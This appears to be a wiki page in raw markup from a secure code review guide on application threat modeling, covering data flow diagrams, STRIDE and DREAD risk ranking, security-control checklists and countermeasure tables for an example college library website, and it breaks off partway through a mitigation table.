&lt;br /&gt;
'''Data Store'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The data store shape is used to represent locations where data is stored. Data stores do not modify the data, they only store data.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_data_store.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Data Flow'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The data flow shape represents data movement within the application. The direction of the data movement is represented by the arrow.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_data_flow.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
'''Privilege Boundary'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The privilege boundary shape is used to represent the change of privilege levels as the data flows through the application.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_privilge_boundary.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Example===&lt;br /&gt;
&amp;lt;br/&amp;gt; '''Data Flow Diagram for the College Library Website'''&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:Data flow1.jpg]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
'''User Login Data Flow Diagram for the College Library Website'''&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:Data flow2.jpg]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Determine and Rank Threats ==&lt;br /&gt;
===Threat Categorization===&lt;br /&gt;
The first step in the determination of threats is adopting a threat categorization. A threat categorization provides a set of threat categories with corresponding examples so that threats can be systematically identified in the application in a structured and repeatable manner. &lt;br /&gt;
&lt;br /&gt;
====STRIDE====&lt;br /&gt;
A threat categorization such as STRIDE is useful in the identification of threats by classifying attacker goals such as:&lt;br /&gt;
*Spoofing&lt;br /&gt;
*Tampering&lt;br /&gt;
*Repudiation&lt;br /&gt;
*Information Disclosure&lt;br /&gt;
*Denial of Service&lt;br /&gt;
*Elevation of Privilege.&lt;br /&gt;
&lt;br /&gt;
A threat list of generic threats organized in these categories with examples and the affected security controls is provided in the following table:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;STRIDE Threat List&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Type&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Examples&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Security Control&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Spoofing&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat action aimed to illegally access and use another user's credentials, such as username and password.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Authentication&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Tampering&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat action aimed to maliciously change/modify persistent data, such as persistent data in a database, and the alteration of data in transit between two computers over an open network, such as the Internet.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Integrity&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Repudiation&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat action aimed to perform illegal operations in a system that lacks the ability to trace the prohibited operations.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Non-Repudiation&amp;lt;/td&amp;gt; &lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Information disclosure&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat action to read a file that one was not granted access to, or to read data in transit. &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Confidentiality&amp;lt;/td&amp;gt; &lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Denial of service&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat aimed to deny access to valid users, such as by making a web server temporarily unavailable or unusable. &lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Availability&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Elevation of privilege&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat aimed to gain privileged access to resources for gaining unauthorized access to information or to compromise a system.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Authorization&amp;lt;/td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Security Controls==&lt;br /&gt;
Once the basic threat agents and business impacts are understood, the review team should try to identify the set of controls that could prevent these threat agents from causing those impacts.  The primary focus of the code review should be to ensure that these security controls are in place, that they work properly, and that they are correctly invoked in all the necessary places. The checklist below can help to ensure that all the likely risks have been considered.&lt;br /&gt;
&lt;br /&gt;
'''Authentication:'''&lt;br /&gt;
*Ensure all internal and external connections (user and entity) go through an appropriate and adequate form of authentication. Be assured that this control cannot be bypassed. &lt;br /&gt;
*Ensure all pages enforce the requirement for authentication. &lt;br /&gt;
*Ensure that whenever authentication credentials or any other sensitive information is passed, only accept the information via the HTTP “POST” method and will not accept it via the HTTP “GET” method. &lt;br /&gt;
*Any page deemed by the business or the development team as being outside the scope of authentication should be reviewed in order to assess any possibility of security breach. &lt;br /&gt;
*Ensure that authentication credentials do not traverse the wire in clear text form. &lt;br /&gt;
*Ensure development/debug backdoors are not present in production code. &lt;br /&gt;
&lt;br /&gt;
'''Authorization: '''&lt;br /&gt;
*Ensure that there are authorization mechanisms in place. &lt;br /&gt;
*Ensure that the application has clearly defined the user types and the rights of said users. &lt;br /&gt;
*Ensure there is a least privilege stance in operation. &lt;br /&gt;
*Ensure that the Authorization mechanisms work properly, fail securely, and cannot be circumvented. &lt;br /&gt;
*Ensure that authorization is checked on every request. &lt;br /&gt;
*Ensure development/debug backdoors are not present in production code. &lt;br /&gt;
&lt;br /&gt;
'''Cookie Management: '''&lt;br /&gt;
*Ensure that sensitive information is not comprised. &lt;br /&gt;
*Ensure that unauthorized activities cannot take place via cookie manipulation. &lt;br /&gt;
*Ensure that proper encryption is in use. &lt;br /&gt;
*Ensure secure flag is set to prevent accidental transmission over “the wire” in a non-secure manner. &lt;br /&gt;
*Determine if all state transitions in the application code properly check for the cookies and enforce their use. &lt;br /&gt;
*Ensure the session data is being validated. &lt;br /&gt;
*Ensure cookies contain as little private information as possible. &lt;br /&gt;
*Ensure entire cookie is encrypted if sensitive data is persisted in the cookie. &lt;br /&gt;
*Define all cookies being used by the application, their name, and why they are needed. &lt;br /&gt;
&lt;br /&gt;
'''Data/Input Validation: '''&lt;br /&gt;
*Ensure that a DV mechanism is present. &lt;br /&gt;
*Ensure all input that can (and will) be modified by a malicious user such as HTP headers, input fields, hidden fields, drop down lists, and other web components are properly validated. &lt;br /&gt;
*Ensure that the proper length checks on all input exist. &lt;br /&gt;
*Ensure that all fields, cookies, http headers/bodies, and form fields are validated. &lt;br /&gt;
*Ensure that the data is well formed and contains only known good chars if possible. &lt;br /&gt;
*Ensure that the data validation occurs on the server side. &lt;br /&gt;
*Examine where data validation occurs and if a centralized model or decentralized model is used. &lt;br /&gt;
*Ensure there are no backdoors in the data validation model. &lt;br /&gt;
*'''Golden Rule: All external input, no matter what it is, is examined and validated. '''&lt;br /&gt;
&lt;br /&gt;
'''Error Handling/Information leakage: '''&lt;br /&gt;
*Ensure that all method/function calls that return a value have proper error handling and return value checking. &lt;br /&gt;
*Ensure that exceptions and error conditions are properly handled. &lt;br /&gt;
*Ensure that no system errors can be returned to the user. &lt;br /&gt;
*Ensure that the application fails in a secure manner. &lt;br /&gt;
*Ensure resources are released if an error occurs. &lt;br /&gt;
&lt;br /&gt;
'''Logging/Auditing: '''&lt;br /&gt;
*Ensure that no sensitive information is logged in the event of an error. &lt;br /&gt;
*Ensure the payload being logged is of a defined maximum length and that the logging mechanism enforces that length. &lt;br /&gt;
*Ensure no sensitive data can be logged; e.g. cookies, HTTP “GET” method, authentication credentials. &lt;br /&gt;
*Examine if the application will audit the actions being taken by the application on behalf of the client (particularly data manipulation/Create, Update, Delete (CUD) operations). &lt;br /&gt;
*Ensure successful and unsuccessful authentication is logged. &lt;br /&gt;
*Ensure application errors are logged. &lt;br /&gt;
*Examine the application for debug logging with the view to logging of sensitive data. &lt;br /&gt;
&lt;br /&gt;
'''Cryptography: '''&lt;br /&gt;
*Ensure no sensitive data is transmitted in the clear, internally or externally. &lt;br /&gt;
*Ensure the application is implementing known good cryptographic methods. &lt;br /&gt;
&lt;br /&gt;
'''Secure Code Environment: '''&lt;br /&gt;
*Examine the file structure. Are any components that should not be directly accessible available to the user?&lt;br /&gt;
*Examine all memory allocations/de-allocations. &lt;br /&gt;
*Examine the application for dynamic SQL and determine if it is vulnerable to injection. &lt;br /&gt;
*Examine the application for “main()” executable functions and debug harnesses/backdoors.&lt;br /&gt;
*Search for commented out code, commented out test code, which may contain sensitive information. &lt;br /&gt;
*Ensure all logical decisions have a default clause. &lt;br /&gt;
*Ensure no development environment kit is contained on the build directories. &lt;br /&gt;
*Search for any calls to the underlying operating system or file open calls and examine the error possibilities. &lt;br /&gt;
&lt;br /&gt;
'''Session Management: '''&lt;br /&gt;
*Examine how and when a session is created for a user, unauthenticated and authenticated. &lt;br /&gt;
*Examine the session ID and verify if it is complex enough to fulfill requirements regarding strength. &lt;br /&gt;
*Examine how sessions are stored: e.g. in a database, in memory etc. &lt;br /&gt;
*Examine how the application tracks sessions. &lt;br /&gt;
*Determine the actions the application takes if an invalid session ID occurs. &lt;br /&gt;
*Examine session invalidation. &lt;br /&gt;
*Determine how multithreaded/multi-user session management is performed. &lt;br /&gt;
*Determine the session HTTP inactivity timeout. &lt;br /&gt;
*Determine how the log-out functionality functions.&lt;br /&gt;
&lt;br /&gt;
==Threat Analysis==&lt;br /&gt;
The prerequisite in the analysis of threats is the understanding of the generic definition of risk that is the probability that a threat agent will exploit a vulnerability to cause an impact to the application. From the perspective of risk management, threat modeling is the systematic and strategic approach for identifying and enumerating threats to an application environment with the objective of minimizing risk and the associated impacts. &lt;br /&gt;
&lt;br /&gt;
Threat analysis as such is the identification of the threats to the application, and involves the analysis of each aspect of the application functionality and architecture and design to identify and classify potential weaknesses that could lead to an exploit. &lt;br /&gt;
&lt;br /&gt;
In the first threat modeling step, we have modeled the system showing data flows, trust boundaries, process components, and entry and exit points. An example of such modeling is shown in the Example: Data Flow Diagram for the College Library Website. &lt;br /&gt;
&lt;br /&gt;
Data flows show how data flows logically through the end to end, and allows the identification of affected components through critical points (i.e. data entering or leaving the system, storage of data) and the flow of control through these components. Trust boundaries show any location where the level of trust changes. Process components show where data is processed, such as web servers, application servers, and database servers. Entry points show where data enters the system (i.e. input fields, methods) and exit points are where it leaves the system (i.e. dynamic output, methods), respectively. Entry and exit points define a trust boundary. &lt;br /&gt;
&lt;br /&gt;
Threat lists based on the STRIDE model are useful in the identification of threats with regards to the attacker goals. For example, if the threat scenario is attacking the login, would the attacker brute force the password to break the authentication? If the threat scenario is to try to elevate privileges to gain another user’s privileges, would the attacker try to perform forceful browsing? &lt;br /&gt;
&lt;br /&gt;
It is vital that all possible attack vectors should be evaluated from the attacker’s point of view. For this reason, it is also important to consider entry and exit points, since they could also allow the realization of certain kinds of threats. For example, the login page allows sending authentication credentials, and the input data accepted by an entry point has to validate for potential malicious input to exploit vulnerabilities such as SQL injection, cross site scripting, and buffer overflows. Additionally, the data flow passing through that point has to be used to determine the threats to the entry points to the next components along the flow. If the following components can be regarded critical (e.g. the hold sensitive data), that entry point can be regarded more critical as well. In an end to end data flow, for example, the input data (i.e. username and password) from a login page, passed on without validation,  could be exploited for a SQL injection attack to manipulate a query for breaking the authentication or to modify a table in the database. &lt;br /&gt;
&lt;br /&gt;
Exit points might serve as attack points to the client (e.g. XSS vulnerabilities) as well for the realization of information disclosure vulnerabilities. For example, in the case of exit points from components handling confidential data (e.g. data access components), exit points lacking security controls to protect the confidentiality and integrity can lead to disclosure of such confidential information to an unauthorized user. &lt;br /&gt;
&lt;br /&gt;
In many cases threats enabled by exit points are related to the threats of the corresponding entry point. In the login example, error messages returned to the user via the exit point might allow for entry point attacks, such as account harvesting (e.g. username not found), or SQL injection (e.g. SQL exception errors). &lt;br /&gt;
&lt;br /&gt;
From the defensive perspective, the identification of threats driven by security control categorization such as ASF, allows a threat analyst to focus on specific issues related to weaknesses (e.g. vulnerabilities) in security controls. Typically the process of threat identification involves going through iterative cycles where initially all the possible threats in the threat list that apply to each component are evaluated. &lt;br /&gt;
&lt;br /&gt;
At the next iteration, threats are further analyzed by exploring the attack paths, the root causes (e.g. vulnerabilities, depicted as orange blocks) for the threat to be exploited, and the necessary mitigation controls (e.g. countermeasures, depicted as green blocks). A threat tree as shown in figure 2 is useful to perform such threat analysis &lt;br /&gt;
&lt;br /&gt;
[[Image:Threat_Graph.gif|Figure 2: Threat Graph]]&lt;br /&gt;
&lt;br /&gt;
Once common threats, vulnerabilities, and attacks are assessed, a more focused threat analysis should take in consideration use and abuse cases. By thoroughly analyzing the use scenarios, weaknesses can be identified that could lead to the realization of a threat. Abuse cases should be identified as part of the security requirement engineering activity. These abuse cases can illustrate how existing protective measures could be bypassed, or where a lack of such protection exists. A use and misuse case graph for authentication is shown in figure below:&lt;br /&gt;
&lt;br /&gt;
[[Image:UseAndMisuseCase.jpg|Figure 3: Use and Misuse Case]]&lt;br /&gt;
&lt;br /&gt;
Finally, it is possible to bring all of this together by determining the types of threat to each component of the decomposed system. This can be done by using a threat categorization such as STRIDE or ASF, the use of threat trees to determine how the threat can be exposed by a vulnerability, and use and misuse cases to further validate the lack of a countermeasure to mitigate the threat.&lt;br /&gt;
&lt;br /&gt;
To apply STRIDE to the data flow diagram items the following table can be used: &lt;br /&gt;
&lt;br /&gt;
TABLE&lt;br /&gt;
&lt;br /&gt;
==Ranking of Threats==&lt;br /&gt;
Threats can be ranked from the perspective of risk factors. By determining the risk factor posed by the various identified threats, it is possible to create a prioritized list of threats to support a risk mitigation strategy, such as deciding on which threats have to be mitigated first. Different risk factors can be used to determine which threats can be ranked as High, Medium, or Low risk. In general, threat risk models use different factors to model risks such as those shown in figure below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:Riskfactors.JPG|Figure 3: Risk Model Factors]]&lt;br /&gt;
&lt;br /&gt;
==DREAD==&lt;br /&gt;
In the Microsoft DREAD threat-risk ranking model, the technical risk factors for impact are Damage and Affected Users, while the ease of exploitation factors are Reproducibility, Exploitability and Discoverability. This risk factorization allows the assignment of values to the different influencing factors of a threat. To determine the ranking of a threat, the threat analyst has to answer basic questions for each factor of risk, for example: &lt;br /&gt;
&lt;br /&gt;
*For Damage: How big the damage can be?&lt;br /&gt;
*For Reproducibility: How easy is it to reproduce an attack to work?&lt;br /&gt;
*For Exploitability: How much time, effort, and expertise is needed to exploit the threat?&lt;br /&gt;
*For Affected Users: If a threat were exploited, what percentage of users would be affected?&lt;br /&gt;
*For Discoverability: How easy is it for an attacker to discover this threat?&lt;br /&gt;
&lt;br /&gt;
By referring to the college library website it is possible to document sample threats releated to the use cases such as: &lt;br /&gt;
&lt;br /&gt;
'''Threat: Malicious user views confidential information of students, faculty members and librarians.'''&lt;br /&gt;
# '''Damage potential:''' Threat to reputation as well as financial and legal liability:8&lt;br /&gt;
# '''Reproducibility:'''  Fully reproducible:10&lt;br /&gt;
# '''Exploitability:'''   Require to be on the same subnet or have compromised a router:7&lt;br /&gt;
# '''Affected users:'''   Affects all users:10&lt;br /&gt;
# '''Discoverability:'''  Can be found out easily:10&lt;br /&gt;
&lt;br /&gt;
Overall DREAD score: (8+10+7+10+10) / 5 = 9&lt;br /&gt;
&lt;br /&gt;
In this case having 9 on a 10 point scale is certainly an high risk threat&lt;br /&gt;
&lt;br /&gt;
==Generic Risk Model==&lt;br /&gt;
A more generic risk model takes into consideration the Likelihood (e.g. probability of an attack) and the Impact (e.g. damage potential): &lt;br /&gt;
&lt;br /&gt;
'''Risk = Likelihood x Impact'''&lt;br /&gt;
&lt;br /&gt;
The likelihood or probability is defined by the ease of exploitation, which mainly depends on the type of threat and the system characteristics, and by the possibility to realize a threat, which is determined by the existence of an appropriate countermeasure.  &lt;br /&gt;
&lt;br /&gt;
The following is a set of considerations for determining ease of exploitation: &lt;br /&gt;
# Can an attacker exploit this remotely? &lt;br /&gt;
# Does the attacker need to be authenticated?&lt;br /&gt;
# Can the exploit be automated?&lt;br /&gt;
&lt;br /&gt;
The impact mainly depends on the damage potential and the extent of the impact, such as the number of components that are affected by a threat. &lt;br /&gt;
&lt;br /&gt;
Examples to determine the damage potential are:&lt;br /&gt;
# Can an attacker completely take over and manipulate the system?  &lt;br /&gt;
# Can an attacker gain administration access to the system?&lt;br /&gt;
# Can an attacker crash the system? &lt;br /&gt;
# Can the attacker obtain access to sensitive information such as secrets, PII&lt;br /&gt;
&lt;br /&gt;
Examples to determine the number of components that are affected by a threat:&lt;br /&gt;
# How many data sources and systems can be impacted?&lt;br /&gt;
# How “deep” into the infrastructure can the threat agent go?&lt;br /&gt;
&lt;br /&gt;
These examples help in the calculation of the overall risk values by assigning qualitative values such as High, Medium and Low to Likelihood and Impact factors. In this case, using qualitative values, rather than numeric ones like in the case of the DREAD model, help avoid the ranking becoming overly subjective.&lt;br /&gt;
&lt;br /&gt;
==Countermeasure Identification==&lt;br /&gt;
The purpose of the countermeasure identification is to determine if there is some kind of protective measure (e.g. security control, policy measures) in place that can prevent each threat previosly identified via threat analysis from being realized. Vulnerabilities are then those threats that have no countermeasures. Since each of these threats has been categorized either with STRIDE or ASF, it is possible to find appropriate countermeasures in the application within the given category. &lt;br /&gt;
&lt;br /&gt;
Provided below is a brief and limited checklist which is by no means an exhaustive list for identifying countermeasures for specific threats. &lt;br /&gt;
 &lt;br /&gt;
Example of countermeasures for ASF threat types are included in the following table: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;ASF Threat &amp;amp; Countermeasures List&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Threat Type&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Countermeasure&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Authentication&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Credentials and authentication tokens are protected with encryption in storage and transit&lt;br /&gt;
#Protocols are resistant to brute force, dictionary, and replay attacks&lt;br /&gt;
#Strong password policies are enforced&lt;br /&gt;
#Trusted server authentication is used instead of SQL authentication&lt;br /&gt;
#Passwords are stored with salted hashes&lt;br /&gt;
#Password resets do not reveal password hints and valid usernames&lt;br /&gt;
#Account lockouts do not result in a denial of service attack&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Authorization&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Strong ACLs are used for enforcing authorized access to resources&lt;br /&gt;
#Role-based access controls are used to restrict access to specific operations&lt;br /&gt;
#The system follows the principle of least privilege for user and service accounts&lt;br /&gt;
#Privilege separation is correctly configured within the presentation, business and data access layers&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Configuration Management&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Least privileged processes are used and service accounts with no administration capability&lt;br /&gt;
#Auditing and logging of all administration activities is enabled&lt;br /&gt;
#Access to configuration files and administrator interfaces is restricted to administrators&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Data Protection in Storage and Transit&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Standard encryption algorithms and correct key sizes are being used&lt;br /&gt;
#Hashed message authentication codes (HMACs) are used to protect data integrity&lt;br /&gt;
#Secrets (e.g. keys, confidential data ) are cryptographically protected both in transport and in storage&lt;br /&gt;
#Built-in secure storage is used for protecting keys&lt;br /&gt;
#No credentials and sensitive data are sent in clear text over the wire&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Data Validation / Parameter Validation&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Data type, format, length, and range checks are enforced&lt;br /&gt;
#All data sent from the client is validated&lt;br /&gt;
#No security decision is based upon parameters (e.g. URL parameters) that can be manipulated&lt;br /&gt;
#Input filtering via white list validation is used&lt;br /&gt;
#Output encoding is used&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Error Handling and Exception Management&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#All exceptions are handled in a structured manner&lt;br /&gt;
#Privileges are restored to the appropriate level in case of errors and exceptions&lt;br /&gt;
#Error messages are scrubbed so that no sensitive information is revealed to the attacker&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;User and Session Management&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#No sensitive information is stored in clear text in the cookie&lt;br /&gt;
#The contents of the authentication cookies is encrypted&lt;br /&gt;
#Cookies are configured to expire&lt;br /&gt;
#Sessions are resistant to replay attacks&lt;br /&gt;
#Secure communication channels are used to protect authentication cookies&lt;br /&gt;
#User is forced to re-authenticate when performing critical functions&lt;br /&gt;
#Sessions are expired at logout&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Auditing and Logging&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Sensitive information (e.g. passwords, PII) is not logged&lt;br /&gt;
#Access controls (e.g. ACLs) are enforced on log files to prevent un-authorized access&lt;br /&gt;
#Integrity controls (e.g. signatures) are enforced on log files to provide non-repudiation&lt;br /&gt;
#Log files provide for audit trail for sensitive operations and logging of key events&lt;br /&gt;
#Auditing and logging is enabled across the tiers on multiple servers&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When using STRIDE, the following threat-mitigation table can be used to identify techniques that can be employed to mitigate the threats.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;STRIDE Threat &amp;amp; Mitigation Techniques List&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Threat Type&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Mitigation Techniques&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Spoofing Identity&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Appropriate authentication&lt;br /&gt;
#Protect secret data&lt;br /&gt;
#Don't store secrets&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Tampering with data&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Appropriate authorization&lt;br /&gt;
#Hashes&lt;br /&gt;
#MACs&lt;br /&gt;
#Digital signatures&lt;br /&gt;
#Tamper resistant protocols&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Repudiation&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Digital signatures&lt;br /&gt;
#Timestamps&lt;br /&gt;
#Audit trails&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Information Disclosure&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Authorization&lt;br /&gt;
#Privacy-enhanced protocols&lt;br /&gt;
#Encryption&lt;br /&gt;
#Protect secrets&lt;br /&gt;
#Don't store secrets&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
